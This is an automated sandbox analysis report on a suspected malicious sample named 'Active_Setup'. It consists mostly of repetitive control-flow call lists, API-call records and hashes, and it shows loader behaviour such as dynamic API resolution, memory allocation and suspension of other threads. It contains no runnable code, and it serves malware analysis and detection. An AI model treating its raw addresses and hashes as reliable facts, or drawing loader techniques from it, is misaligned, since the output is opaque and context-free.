                                                                                                                                                  control_flow_graph 954 fb6180-fb781c call ff8976 call ffa708 call 101895d call 1050a74 call fe57ef call fd86d3 call 107c20e call fb3829 call 1083eef call 105595d call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1287 fb782e-fb7844 call fb7360 954->1287 1288 fb781e-fb7821 954->1288 1294 fb7863-fb786b 1287->1294 1295 fb7846-fb7862 1287->1295 1288->1287 1290 fb7823-fb782b call fca3c0 1288->1290 1290->1287
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 4585b0e3c8a223188c8d0f80dda1459872d2b09e0fabaf7008015be5ee7c5128
                                                                                                                                                  • Instruction ID: 563e7f087a0365d8449039f6d3bb465768c4b74c146cd2fdf6290e8eaa949fe2
                                                                                                                                                  • Opcode Fuzzy Hash: 4585b0e3c8a223188c8d0f80dda1459872d2b09e0fabaf7008015be5ee7c5128
                                                                                                                                                  • Instruction Fuzzy Hash: 38B212729143258FD768EFB6EC9B16A37A2FB90300346822ED4C29794DDF3F54469B81
                                                                                                                                                  Function 00FB6350 Relevance: 8.4, APIs: 3, Strings: 1, Instructions: 1366libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1297 fb6350-fb781c call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1608 fb782e-fb7844 call fb7360 1297->1608 1609 fb781e-fb7821 1297->1609 1615 fb7863-fb786b 1608->1615 1616 fb7846-fb7862 1608->1616 1609->1608 1611 fb7823-fb782b call fca3c0 1609->1611 1611->1608
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 1646373207-4269328691
                                                                                                                                                  • Opcode ID: 078b5e00d947b0cc57e86eec01e2bb0b217662aaa554f051ae52369f79c42630
                                                                                                                                                  • Instruction ID: b46f1b7eb3f2d793c6252c6cca99bb841a2625c66294258b9e0e8464b79165eb
                                                                                                                                                  • Opcode Fuzzy Hash: 078b5e00d947b0cc57e86eec01e2bb0b217662aaa554f051ae52369f79c42630
                                                                                                                                                  • Instruction Fuzzy Hash: 81A213729043258FD768EF75EC9B16A37A2FB90300386862ED4C29794DDF3F54469B81
                                                                                                                                                  Function 00FB63F0 Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 1324libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1618 fb63f0-fb781c GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1920 fb782e-fb7844 call fb7360 1618->1920 1921 fb781e-fb7821 1618->1921 1927 fb7863-fb786b 1920->1927 1928 fb7846-fb7862 1920->1928 1921->1920 1923 fb7823-fb782b call fca3c0 1921->1923 1923->1920
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 1646373207-4269328691
                                                                                                                                                  • Opcode ID: 9f79325609c8ae43d1c0f457f92fe39317ba395a80035addce73d021e0117cba
                                                                                                                                                  • Instruction ID: 153558f840ae96dbce8f17c831e081bd12d8e1f766a4f99765fa52698a65c090
                                                                                                                                                  • Opcode Fuzzy Hash: 9f79325609c8ae43d1c0f457f92fe39317ba395a80035addce73d021e0117cba
                                                                                                                                                  • Instruction Fuzzy Hash: E0A213729103258FD768EFB6EC9B16A37A2FB90300346862ED4C29794DDF3F54469B81
                                                                                                                                                  Function 009402B9 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 399threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1930 9402b9-940421 call 940869 call 940e69 call 941019 call 940c09 1939 940427-94042e 1930->1939 1940 940852-940855 1930->1940 1941 940439-94043d 1939->1941 1942 94045f-9404da GetPEB 1941->1942 1943 94043f-94045d call 940d89 1941->1943 1944 9404e5-9404e9 1942->1944 1943->1941 1946 940501-940513 call 9409c9 1944->1946 1947 9404eb-9404ff 1944->1947 1953 940515-94053b 1946->1953 1954 94053d-94055e CreateThread 1946->1954 1947->1944 1955 940561-940565 1953->1955 1954->1955 1957 940826-940850 TerminateProcess 1955->1957 1958 94056b-94059e call 940ec9 1955->1958 1957->1940 1958->1957 1962 9405a4-9405f3 1958->1962 1964 9405fe-940604 1962->1964 1965 940606-94060c 1964->1965 1966 94064c-940650 1964->1966 1967 94060e-94061d 1965->1967 1968 94061f-940623 1965->1968 1969 940656-940663 1966->1969 1970 94071e-940811 call 9409c9 call 940869 call 940e69 1966->1970 1967->1968 1971 940625-940633 1968->1971 1972 94064a 1968->1972 1973 94066e-940674 1969->1973 1996 940816-940820 1970->1996 1997 940813 1970->1997 1971->1972 1974 940635-940647 1971->1974 1972->1964 1977 9406a4-9406a7 1973->1977 1978 940676-940684 1973->1978 1974->1972 1981 9406aa-9406b1 1977->1981 1979 940686-940695 1978->1979 1980 9406a2 1978->1980 1979->1980 1983 940697-9406a0 1979->1983 1980->1973 1981->1970 1985 9406b3-9406bc 1981->1985 1983->1977 1985->1970 1988 9406be-9406ce 1985->1988 1990 9406d9-9406e5 1988->1990 1992 940716-94071c 1990->1992 1993 9406e7-940714 1990->1993 1992->1981 1993->1990 1996->1957 1997->1996
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0094055C
                                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00940850
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                                                                  • String ID: ]u4*$9s=
                                                                                                                                                  • API String ID: 1197810419-84510002
                                                                                                                                                  • Opcode ID: 281e4224f5a08ab22d1ad742d5625bf4df9fd6a55c799a333b5da2afaf4d0580
                                                                                                                                                  • Instruction ID: c5868ff6e4fc3ef743c75edd9daace381f448698596a35ca11d7951b5532c825
                                                                                                                                                  • Opcode Fuzzy Hash: 281e4224f5a08ab22d1ad742d5625bf4df9fd6a55c799a333b5da2afaf4d0580
                                                                                                                                                  • Instruction Fuzzy Hash: A012C3B0E00219DFDB14DF98C990BADBBB2FF88304F2486A9D615AB385C7356A51CF54
                                                                                                                                                  Function 00FB65A0 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1218librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1998 fb65a0-fb65c1 1999 fb65cc-fb781c call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 1998->1999 2000 fb65c7 call ffb542 1998->2000 2284 fb782e-fb7844 call fb7360 1999->2284 2285 fb781e-fb7821 1999->2285 2000->1999 2291 fb7863-fb786b 2284->2291 2292 fb7846-fb7862 2284->2292 2285->2284 2287 fb7823-fb782b call fca3c0 2285->2287 2287->2284
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 2770133467-4269328691
                                                                                                                                                  • Opcode ID: 9d449ce88e24e0f79229d0e62c674682a15fd3f64e53785be1acf963676aebfb
                                                                                                                                                  • Instruction ID: 68d3196ee2392d9673e7761c3253d535b53fe67215e02ac8372ce7977549491b
                                                                                                                                                  • Opcode Fuzzy Hash: 9d449ce88e24e0f79229d0e62c674682a15fd3f64e53785be1acf963676aebfb
                                                                                                                                                  • Instruction Fuzzy Hash: FA9213729003258FD768EFB6EC9B16A37A2FB90310346862ED4C29794DDF3F54469B81
                                                                                                                                                  Function 00FB6600 Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 1195librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2294 fb6600-fb6623 2295 fb662e-fb781c call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 2294->2295 2296 fb6629 call ff95d7 2294->2296 2578 fb782e-fb7844 call fb7360 2295->2578 2579 fb781e-fb7821 2295->2579 2296->2295 2585 fb7863-fb786b 2578->2585 2586 fb7846-fb7862 2578->2586 2579->2578 2581 fb7823-fb782b call fca3c0 2579->2581 2581->2578
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 2770133467-4269328691
                                                                                                                                                  • Opcode ID: b8ac3f6f540d335c4ce85243e2f98dfc4417f26725c484aa60e0f6395d336d8d
                                                                                                                                                  • Instruction ID: 93a4292d1a988ce40a3388b4db28c64da785348d511df89af7d9c917e5807fd9
                                                                                                                                                  • Opcode Fuzzy Hash: b8ac3f6f540d335c4ce85243e2f98dfc4417f26725c484aa60e0f6395d336d8d
                                                                                                                                                  • Instruction Fuzzy Hash: AF9223729003258FD768EFB6EC9B16A37A2FB90300346862ED4C29794DDF3F54469B81
                                                                                                                                                  Function 009409C9 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2588 9409c9-940a10 CreateToolhelp32Snapshot 2591 940ae6-940ae9 2588->2591 2592 940a16-940a37 Thread32First 2588->2592 2593 940ad2-940ae1 2592->2593 2594 940a3d-940a43 2592->2594 2593->2591 2595 940a45-940a4b 2594->2595 2596 940ab2-940acc 2594->2596 2595->2596 2597 940a4d-940a6c 2595->2597 2596->2593 2596->2594 2597->2596 2600 940a6e-940a72 2597->2600 2601 940a74-940a88 Wow64SuspendThread 2600->2601 2602 940a8a-940a99 2600->2602 2603 940a9e-940ab0 CloseHandle 2601->2603 2602->2603 2603->2596
                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0094050F,?,00000001,?,81EC8B55,000000FF), ref: 00940A07
                                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 00940A33
                                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 00940A86
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00940AB0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
